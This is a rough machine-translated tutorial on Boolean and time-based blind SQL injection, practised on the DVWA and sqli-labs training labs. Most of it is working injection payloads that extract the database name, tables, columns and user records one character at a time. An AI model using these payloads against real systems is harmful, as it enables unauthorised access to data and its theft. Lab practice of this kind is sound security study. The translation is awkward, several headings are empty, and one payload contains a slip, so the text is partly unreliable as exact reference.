Bull's blind note

When inputting data , It will only echo normal or abnormal , There will be no redundant information echo

The correlation function that Boolean blind annotation will use

length(str)            // Returns the string length

Echo effect ：

ord(str)/ascii(str)        // Return character's ASCII code

Echo effect ：

 
substring(str,str_start,str_num)    // Intercepting string , str_start Intercept from that character , str_num Intercept a few characters

Echo effect ：

 
char(num)            // return ascii The character corresponding to the code

Echo effect ：

Boolean blind note Correlation test payload

select length(database()) = 4;            // Used to judge the length of the database ？（ Table name length 、 Column leader ）
select ord('a') = 97;            // It can be used to judge what an unknown character is
select ord(substring(database(),1,1)) = 100;       // Intercept the first character of the database to determine what it is

The main idea of Boolean blind note ： Using functions and inequalities and equations , Judge the length of the data , Try one character at a time , Get the name of the database , Then judge how many tables there are by the name of the database , Try to get the name of the table one character at a time .........

Boolean blind range practice

First, judge whether there is SQL Inject

Digital ？？？—— 1 and 1=1   1 and 1=2 There is no error

Character ？？？—— 1' and '1'='1 No mistake        1' and '1'='2 Report errors

It indicates that there may be character type SQL Inject

As a result

Because the results will not have relevant information echoed , So we can only try blind injection

From the source code SQL The sentence is

SELECT first_name, last_name FROM users WHERE user_id = '$id'

First step —— Determine the length of the database name

payload（ Two kinds of ）：

1' and length(database()) = 4#

-1' or length(database()) = 4#

We didn't know in advance that the name of the database is equal to dvwa, So at first we can use <10,>1 A similar statement , Step by step, we finally get length(database())=4 , Echo existing results , That is, the judgment is correct

The second step —— Name of the launch database

payload：

1' and ord(substring(database(),1,1)) = 100#	// The first letter of the database name is  d  That is to say  ASCII Code for  100  The letter of 

1' and ord(substring(database(),2,1)) = 118#	// The second letter of the database name is  v  That is to say  ASCII Code for  118  The letter of 

..............

utilize substring The function constantly intercepts characters of the database name , from 1 Began to intercept , Until 4（ Because in the first step, we determined that the length of the database name is 4）, recycling ord Function converts it to ascii code , To judge what each character is

The third step —— Judge dvwa There are several tables in the database

payload：

1' and (select count(table_name) from information_schema.tables where table_schema='dvwa') = 2#		// Judge  dvwa  There are several data tables in the database 

Step four —— Judge the length of the first table 、 The length of the second table .......

payload：

1' and length((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1)) = 9#	// Judge  dvwa  The length of the first data table in the database (guestbook)

1' and length((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1)) = 5#	// Judge  dvwa  The length of the second data table in the database (users)

Too tired , I don't want to write. , be-all payload It's like this

1' and ord(substring((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)) = 103#        // obtain dvwa The first letter of the name of the first table in the is g That is to say ASCII Code for 103 The letter of (g)
    1' and ord(substring((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1)) = 117#        // obtain dvwa The second letter of the name of the first table in is u That is to say ASCII Code for 117 The letter of (u)
    ...

    1' and ord(substring((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1)) = 117#        // obtain dvwa The second letter of the name of the second table in is u That is to say ASCII Code for 117 The letter of (u)
    1' and ord(substring((select table_name from information_schema.tables where table_schema=database() limit 1,1),2,1)) = 115#(s)
    ...

    1' and (select count(column_name) from information_schema.columns where table_schema = 'dvwa' and table_name = 'users') = 8#    // Judge dvwa In the database users The number of all columns in the table
    1' and length((select column_name from information_schema.columns where table_schema = 'dvwa' and table_name = 'users' limit 0,1)) = 7#    // Judge dvwa In the database users The length of the name of the first column in the table

    1' and ord(substring((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1)) = 117#        // obtain users The first letter of the name of the first column in the table is u That is to say ASCII Code for 117 The letter of (u)
    1' and ord(substring((select column_name from information_schema.columns where table_name='users' limit 0,1),2,1)) = 115#        // obtain users The second letter of the name of the first column in the table is s That is to say ASCII Code for 115 The letter of (s)
    ...

     1' and ord(substring((select column_name from information_schema.columns where table_name='users' limit 1,1),1,1)) = 102#        // obtain users The first letter of the name of the second column in the table is f That is to say ASCII Code for 102 The letter of (f)
    1' and ord(substring((select column_name from information_schema.columns where table_name='users' limit 1,1),2,1)) = 105#        // obtain users The first letter of the name of the second column in the table is i That is to say ASCII Code for 105 The letter of (i)
    ...

    1' and ord(substring((select user from dvwa.users limit 0,1),1,1)) = 97#    // obtain dvwa In the database users In the table user The first letter of the name of the column a That is to say ASCII Code for 97 The letter of (a)
    1' and ord(substring((select user from dvwa.users limit 0,1),2,1)) = 100#    // obtain dvwa In the database users In the table user The first letter of the name of the column d That is to say ASCII Code for 100 The letter of (d)
    ...

Time blind note

Boolean blind injection has at least echo correct results and incorrect results , But there is a situation where nothing is echoed , At this time, it may have time blindness

The range used ——sqli-labs-master less9

No matter what the input id How much? , Echo is always consistent

The correlation function that time blind injection will use

if sentence :
if(a,b,c)  ===> If a by true , execute b , if a by false , execute c.

sleep(x):
Program sleep x second .

left(string, number):
Intercept the string from the left .

Time blind Correlation test payload

select 1 and if(length(database()) = 4,sleep(3),1)
1' and sleep(3) --+             // Used to test whether there is event blindness

By judging whether the web page will instantly echo , To judge whether the input statement is right or wrong , Then we can get the data we want step by step

Time blind shooting range practice

SQL Source code ：

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

payload：

1' and sleep(5) --+        // Determine if there is an injection point
    1' and if(length(database())=8,sleep(3),1) --+    // Judge whether the length of the database is 8
    1' and if(left(database(),1)='s',sleep(3),1) --+    // Judge whether the first character of the name of the database 's'
    1' and if(left(database(),2)='se',sleep(3),1) --+    // Judge whether the first two characters of the name of the database are 'se'
    ... 
    1' and if(left(database(),8)='security',sleep(3),1) --+    // Database name 'security'
    
    1' and if(length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=6,sleep(3),1) --+        // Judge the length of the first table after the database sorting
    1' and if(left((select table_name from information_schema.tables where table_schema=database() limit 0,1),1)='e',sleep(3),1) --+        // Is the first character of the name of the first table after the database sorting 'e'
    1' and if(left((select table_name from information_schema.tables where table_schema=database() limit 0,1),2)='em',sleep(3),1) --+        // Whether the first two characters of the name of the first table after the database sorting 'em'
    ...
    1' and if(left((select table_name from information_schema.tables where table_schema=database() limit 0,1),8)='emails',sleep(3),1) --+        // The name of the first table after the database sorting is 'emails'

    1' and if(length((select column_name from information_schema.columns where table_name='emails' limit 0,1))=2,sleep(3),1) --+            // Judge 'security' Data tables in the database 'emails' The name length of the first column in
    1' and if(left((select column_name from information_schema.columns where table_name='emails' limit 0,1),1)='i',sleep(3),1) --+            // Judge 'security' Data tables in the database 'emails' The first letter of the name of the first column in 'i'
    1' and if(left((select column_name from information_schema.columns where table_name='emails' limit 0,1),2)='id',sleep(3),1) --+            // Judge 'security' Data tables in the database 'emails' The first two letters of the name of the first column in 'id'